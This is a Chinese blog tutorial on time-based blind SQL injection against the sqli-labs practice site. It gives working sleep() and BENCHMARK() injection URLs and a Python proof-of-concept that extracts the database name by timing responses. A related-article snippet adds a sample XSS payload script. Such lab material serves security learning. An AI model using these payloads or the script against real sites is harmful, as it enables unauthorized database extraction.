Python编写POC时间盲注

最新推荐文章于 2024-10-18 00:00:00 发布
最新推荐文章于 2024-10-18 00:00:00 发布
阅读量367 收藏 3
点赞数 4
分类专栏: MySql-injection 文章标签: python 数据库 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/141113078
版权

延时注入

  1. 用sleep()函数尝试注入
http://localhost/sqli-labs/Less-5/?id=1%27and%20if%20(ascii(substr(database(),1,1))=115,1,sleep(3))%20--+

在这里插入图片描述
当错误时,会有3秒的时间延时。
在这里插入图片描述

  1. 利用BENCHMARK()进行延时注入,当结果正确的时候,运行ENCODE(‘MSG’,‘by 5 seconds’)操作50000000次,会占用一段时间。
?id=1%27UNION%20SELECT%20(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)),null)),2,3%20FROM%20(select%20database()%20as%20current)%20as%20tb1--+

在这里插入图片描述

  1. IF 函数和 SUBSTRINGIF(SUBSTRING(current,1,1)=CHAR(115),...) 这部分代码检查 current 字段的第一个字符是否是字符 's'(ASCII 码为 115)。如果是,那么执行后面的代码;如果不是,返回 null。这是攻击者用来检测数据库名称是否以某个特定字符开始的方式。

  2. BENCHMARK 和 ENCODEBENCHMARK(50000000,ENCODE('MSG','by 5 seconds')) 这部分代码用于产生延迟。BENCHMARK 函数执行一个操作指定的次数,这里是 50,000,000 次。ENCODE 函数用于加密字符串,但在这里它的主要目的是产生一个较长的字符串,以使得 BENCHMARK 产生明显的延迟。如果 IF 函数的条件为真,那么这个延迟就会被触发,使得整个查询运行得更慢。攻击者可以通过测量查询的响应时间来判断 IF 函数的条件是否为真,从而推断出数据库名称的第一个字符。

  3. FROM (select database() as current):这部分代码创建了一个子查询,该查询返回当前数据库的名称,并将其别名为 current。这样,攻击者就可以在 IF 函数中引用它。

POC

  • 以Less-9为例:
import requests
import time

url = "http://127.0.0.1/sqli-labs/Less-9/index.php"
def inject_database(url):
    name = ''
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            params = {"id": payload}
            start_time = time.time()
            res = requests.get(url, params=params)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

在这里插入图片描述

CyberSecure
关注
专栏目录
37-5 基于时间盲注 SQL 注入 PoCPython 编写
weixin_43263566的博客
04-24 229
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 188
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写测试阶段进行充分的安全审查和测试
时间SQL盲注
Code-5的博客
04-16 400
函数的条件为真,那么这个延迟就会被触发,使得整个查询运行得更慢。攻击者可以通过测量查询的响应时间来判断。如果是,那么执行后面的代码;函数用于加密字符串,但在这里它的主要目的是产生一个较长的字符串,以使得。:这部分代码创建了一个子查询,该查询返回当前数据库的名称,并将其别名为。函数执行一个操作指定的次数,这里是 50,000,000 次。这是攻击者用来检测数据库名称是否以某个特定字符开始的方式。函数的条件是否为真,从而推断出数据库名称的第一个字符。当错误时,会有3秒的时间延时。这部分代码用于产生延迟。
3.2 SQL盲注时间注入--sql注入python脚本自动打印数据库信息
n0d_xy的博客
04-15 1377
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1688
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
sql注入
linyuezhouzhou的博客
07-08 490
湖南省网安基地
python编写poc_基于Python编写 Poc/Exp 该怎么入门
weixin_29432863的博客
12-23 689
匿名用户1级2016-05-29 回答其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。1. Requests : 模拟Web的请求和响应等交互动作。2. Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 922
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
python编写EXP/POC速成小记
U_U520的博客
02-22 2022
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1259
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
时间盲注python脚本(二分查找优化)支持cookie注入
qq_36915061的博客
12-02 967
时间盲注python脚本(二分查找优化)支持cookie注入 菜鸟自用,仅供参考 使用说明 可根据用途更改payload中的select语句,字符型注入点有两种注入情况: 1、最后添加注释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
基于时间盲注python脚本
weixin_43460822的博客
10-07 2301
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
pandas中数据子集的获取
weixin_43597208的博客
10-14 466
通常,在pandas模块中实现数据框子集的获取可以使用iloc、loc和ix三种方法,这三种方法既可以对数据行进行筛选,也可以实现变量的筛选,它们的语法可以表示成[rows_select,cols_select]。iloc只能通过行号和列号进行数据的筛选,可以将iloc中的i理解为’integer’,即只能向[rows_select,cols_select]指定整数列表该索引方式与数组的索引方式类似,都是从0开始,可以间隔取号,对于切片仍然无法取到上限。
【Java 22 | 8】 深入解析Java 22 :Pattern Matching 特性详解
颜淡慕潇
10-17 2088
Java 22 进一步扩展了模式匹配(Pattern Matching)功能,简化了类型检查和条件表达式的使用。此特性不仅提升了代码的可读性,还减少了常见的错误。以下是对 Java 22 中模式匹配的详细介绍,包括基础概念、增强特性、使用场景、示例代码,以及如何在实际项目中有效利用模式匹配
Python 使用 Jarvis 算法或包装的凸包(Convex Hull using Jarvis’ Algorithm or Wrapping)
csdn_aspnet的专栏
10-14 1197
例如,当输入 (0, 3), (0, 0), (0, 1), (3, 0), (3, 3) 时,它产生 (0, 3) (0, 0) (3, 0) (3, 3) 的输出;当输入 (0, 3), (0, 1), (0, 0), (3, 0), (3, 3) 时,输出为 (0, 3) (0, 1) (0, 0) (3, 0) (3, 3)。下一个点被选为在逆时针方向上领先于所有其他点的点,即,如果对于任何其他点 r,我们有“orientation(p, q, r) = 逆时针”,则下一个点是 q。
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
最新发布
全网粉丝100W+、全栈领域优质创作者、B站、github、CSDN等社区技术专家、专注于高端精品毕业项目源码实战
10-18 399
计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
10月下半记录
cqbzcsq的博客
10-14 151
之后又出现了这种情况,reload window的时候突然断连了,关掉terminal之后再进行reload window就又好了,很奇怪,可能是vscode选择环境和conda出现了一些冲突。indices和data的长度均为矩阵中的非零值个数,indtpr长度为矩阵行数+1且单调不降,且最后一个值等于矩阵中的非零值个数。则说明data[0,1)的值a在第一行,data[1,4)的值bcd在第二行,data[4,8)的值efgh在第三行,第四行没有值。之前都可以正常连接,但是突然就不对了。
python入门到精通专题】8.装饰器
情不知所起一往而深
10-13 781
什么是property属性?一种用起来像是使用的实例属性一样的特殊属性,可以对应于某个方法。class Foo:pass# 定义property属性@propertypassfoo_obj.func() # 调用实例方法foo_obj.prop # 调用property属性@propertyreturn 100定义时,在实例方法的基础上添加 @property 装饰器;并且仅有一个self参数调用时,无需括号。
利用python编写POC
04-03
POC(Proof of Concept)是用于证明漏洞存在的简单代码或脚本。下面是一个使用Python编写POC示例: ```python import requests target_url = "http://example.com/vulnerable_endpoint" payload = "<script>alert('XSS')</script>" response = requests.post(target_url, data={"input": payload}) if payload in response.text: print("Vulnerability exists") else: print("Vulnerability not found") ``` 上述代码尝试在名为“vulnerable_endpoint”的端点上执行跨站脚本(XSS)攻击。如果攻击成功并且响应中包含有效载荷,则输出“Vulnerability exists”,否则输出“Vulnerability not found”。 注意,这只是一个简单的示例,实际上编写POC需要更深入的了解漏洞和攻击技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值